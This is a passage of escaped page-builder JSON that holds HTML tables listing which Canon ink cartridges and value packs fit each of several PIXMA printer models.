width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2577S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac4d506\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2645364\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62e0d92\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3570<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3670<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG7570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP160<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP180<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP228<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP237<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP245<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP258<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP276<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2be4aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d0f60c7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP287<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP460<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP476<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP486<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP496<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP497<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP500<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP520<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP530<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP568<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP600<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b289177\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0d2e40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP610<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP628<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP638<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP648<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800R<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP810<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP830<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP970<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP988<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP996<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d0130d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fc01984\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6549880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX308<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX328<\\/p><\\/td><td 